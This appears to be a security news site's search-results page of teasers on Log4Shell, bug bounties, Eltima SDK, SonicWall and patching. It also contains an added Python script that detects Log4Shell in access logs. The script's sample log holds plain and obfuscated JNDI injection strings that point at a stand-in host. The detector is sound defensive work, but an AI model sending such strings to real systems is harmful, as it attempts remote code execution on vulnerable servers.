Search results for: vulnerability

Log4j

The Log4j JNDI attack and how to prevent it

The disclosure of the critical Log4Shell (CVE-2021-44228) vulnerability and the release of first one and then additional PoC exploits has been an unwelcome surprise for the entire information security community, but most of all for those who are tasked with keeping enterprise systems and networks secure. The timing of it all could have been worse – it could have happened on Christmas Eve, for example – but the news hitting on a Thursday evening/Friday in the run-up … More

Log4j

Log4Shell update: Attack surface, attacks in the wild, mitigation and remediation

Several days have passed since the dramatic reveal of CVE-2021-44228 (aka Log4Shell), an easily exploitable (without authentication) RCE flaw in Apache Log4j, a popular open-source Java-based logging utility that’s seemingly used by most enterprise applications out there. The existence of the vulnerability and the public release of PoCs exploiting it have made this weekend a nightmare for those that are tasked with mitigating its fallout and keeping company systems and networks secure. Log4Shell update: What … More

Hand

Hacker-powered pentests gaining momentum

Hackers have reported over 66,000 valid vulnerabilities this year – over 20% more than 2020 – with hacker-powered pentests seeing a 264% increase in reported vulnerabilities, HackerOne has announced. Pandemic-led digital transformation and cloud migration continue to create vulnerabilities as attack surfaces expand and services are outsourced. This year’s report revealed bounty prices for high and critical vulnerabilities are rising as organizations prioritize high-impact bugs. Businesses are also remediating vulnerabilities faster than ever as vulnerability … More

week in review

Week in review: Apache Log4j 0day exploited, Kali Linux 2021.4 released, Patch Tuesday forecast

Here’s an overview of some of last week’s most interesting news, articles and interviews: Critical RCE 0day in Apache Log4j library exploited in the wild (CVE-2021-44228) A critical zero-day vulnerability in Apache Log4j (CVE-2021-44228), a widely used Java logging library, is being leveraged by attackers in the wild. Kali Linux 2021.4 released: Wider Samba compatibility, The Social-Engineer Toolkit, new tools, and more! Offensive Security released Kali Linux 2021.4, which comes with a number of improvements: … More

Log4j

Critical RCE 0day in Apache Log4j library exploited in the wild (CVE-2021-44228)

A critical zero-day vulnerability in Apache Log4j (CVE-2021-44228), a widely used Java logging library, is being leveraged by attackers in the wild – for now, fortunately, primarily to deliver coin miners. Reported to the Apache Software Foundation by Chen Zhaojun of Alibaba Cloud Security Team, the bug has now apparently been fixed in Log4j v2.15.0, just as a PoC has popped up on GitHub and there are reports that attackers are already attempting to compromise … More
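The two Log4Shell items above describe an unauthenticated RCE that is triggered when attacker-controlled text containing a JNDI lookup reaches a vulnerable Log4j 2 logger, and that attackers in the wild quickly moved to obfuscated variants of the payload. As an added example (written for this listing, not code from any of the linked articles), the following scans constructed web-server access-log lines for the lookup, first undoing the common obfuscations by resolving Log4j's `${lower:...}`, `${upper:...}` and `${name:-default}` lookups innermost-first, then matching the normalized `${jndi:<scheme>:` marker. The log lines, IP addresses and hostnames are made up for the example.

```python
import re

# Innermost lookup: a ${...} whose body contains no further '$', '{' or '}'.
_INNER = re.compile(r"\$\{([^${}]*)\}")

# After normalization the payload always starts with ${jndi:<scheme>:
_JNDI = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)


def _resolve(m):
    """Resolve one innermost lookup the way an attacker relies on Log4j doing it."""
    body = m.group(1)
    low = body.lower()
    if low.startswith("jndi:"):
        return m.group(0)            # keep the lookup we want to detect
    if low.startswith("lower:"):     # ${lower:J} -> j
        return body[len("lower:"):].lower()
    if low.startswith("upper:"):     # ${upper:j} -> J
        return body[len("upper:"):].upper()
    if ":-" in body:                 # ${env:NOPE:-j} and ${::-j} -> j (default value)
        return body.split(":-", 1)[1]
    return m.group(0)                # unknown lookup (e.g. ${date:yyyy}): leave as-is


def normalize(text, max_rounds=50):
    """Repeatedly collapse innermost lookups until the text stops changing."""
    for _ in range(max_rounds):
        new = _INNER.sub(_resolve, text)
        if new == text:
            return new
        text = new
    return text


def find_jndi(line):
    """Return (normalized_line, [schemes]) for one log line."""
    norm = normalize(line)
    schemes = [m.group(1).lower() for m in _JNDI.finditer(norm)]
    return norm, schemes


def scan(log_text):
    """Return (line_number, schemes, normalized_line) for every suspicious line."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        norm, schemes = find_jndi(line)
        if schemes:
            findings.append((n, schemes, norm))
    return findings


# Constructed sample: Apache-style access log with the payload in the User-Agent field.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:22:14:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2021:22:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"
203.0.113.9 - - [10/Dec/2021:22:15:33 +0000] "GET /login HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:r}mi://203.0.113.9:1099/x}"
203.0.113.9 - - [10/Dec/2021:22:16:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.9/y}"
203.0.113.9 - - [10/Dec/2021:22:16:40 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi:dns://203.0.113.9/z}"
198.51.100.7 - - [10/Dec/2021:22:17:11 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 512 "-" "curl/7.79"
"""

if __name__ == "__main__":
    for n, schemes, norm in scan(SAMPLE_LOG):
        print(f"line {n}: jndi via {','.join(schemes)} -> {norm}")
```

Lines 2 to 5 are flagged (schemes ldap, rmi, ldap and dns respectively) while the benign `${date:yyyy}` on line 6 is not. The normalization covers the nested-lookup tricks seen in the first wave of attacks, but it is a log-triage heuristic, not a substitute for patching: it does not decode URL- or Unicode-escaped payloads, and any `${` in attacker-controlled input reaching an unpatched Log4j 2 deserves attention regardless of whether this matcher fires.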

cloud

Vulnerabilities in Eltima SDK affect popular cloud desktop and USB sharing services

SentinelOne researchers have unearthed a number of privilege escalation vulnerabilities in Eltima SDK, a library used by many cloud desktop and USB sharing services like Amazon Workspaces, NoMachine and Accops to allow users to connect and share local devices over the network. “These vulnerabilities allow attackers to escalate privileges enabling them to disable security products, overwrite system components, corrupt the operating system, or perform malicious operations unimpeded,” the researchers shared. The vulnerabilities affect both the cloud … More

Microsoft

Microsoft vulnerabilities have grave implications for organizations of all sizes

Microsoft software products are a connective tissue of many organizations, from online documents (creating, sharing, storing), to email and calendaring, to the operating systems that enable business operations on the front and back ends, both in the cloud and on premises. Over 1 million companies worldwide and over 731,000 companies in the U.S. use Office 365, and though Microsoft offers no hard stats, some sources suggest there are over 90,000 Microsoft partners facilitating services and … More

patch

December 2021 Patch Tuesday forecast: How do you stack up?

I can’t believe that the end of 2021 is already in sight, and looking backwards, I have to say we’ve had our share of interesting events. If I had to characterize it from a security perspective, I’d say this is the year of supply chain attacks. Prior to January, most of us had rarely heard that term, but then SolarWinds, Kaseya, and others were in the news and we heard it throughout the year. Striking … More

security platform

Skybox Security’s network modeling mitigates critical infrastructure security risks

Skybox Security announced new vulnerability management capabilities for operational technology (OT) environments. Available now, the new Skybox Security Posture Management Platform capabilities eliminate cyber exposure across the entire enterprise environment, including IT, hybrid, multi-cloud, and now OT assets. “There is no single solution that will stop cyberattacks, and OT environments are particularly vulnerable. IT/OT convergence demands flexible and vendor-agnostic attack surface modeling to reduce critical cybersecurity risks,” said Haggai Polak, chief product officer, Skybox Security. … More

Appointments

HackerOne appoints Chris Evans as CISO

HackerOne announced the appointment of Chris Evans as Chief Information Security Officer (CISO). A pillar of the security industry, Chris Evans, will also hold the newly created role of Chief Hacking Officer. The Chief Hacking Officer role will give hackers an additional seat at the table at HackerOne, with Chris collaborating with the community to deliver their point of view in executive level discussions. The role will also advise and support organizations with best practices … More

SonicWall

It’s time to patch your SonicWall SMA 100 series appliances again!

SonicWall has fixed a handful of vulnerabilities affecting its SMA 100 series appliances and is urging organizations to implement the patches as soon as possible. Although there’s currently no evidence of these bugs being exploited in active attacks, threat actors have been known to target these appliances in the past by leveraging known and zero-day vulnerabilities. About the vulnerabilities The patched vulnerabilities, which were reported by Jake Baines of Rapid7 and Richard Warren of NCC … More

risk

Extracting value from the interconnected network of risk management

From the CISO to the SOC operator, defenders struggle to maintain complete situational awareness. Holistic approaches to risk management require the implementation of a manageable number of policies and procedures but are tied to an often unmanageable and misunderstood ecosystem of tooling and controls. These inefficiencies are laid bare in frequent public breach reports and are the result of a threat landscape that is increasing in volume, complexity, and novelty. We fail to leverage the … More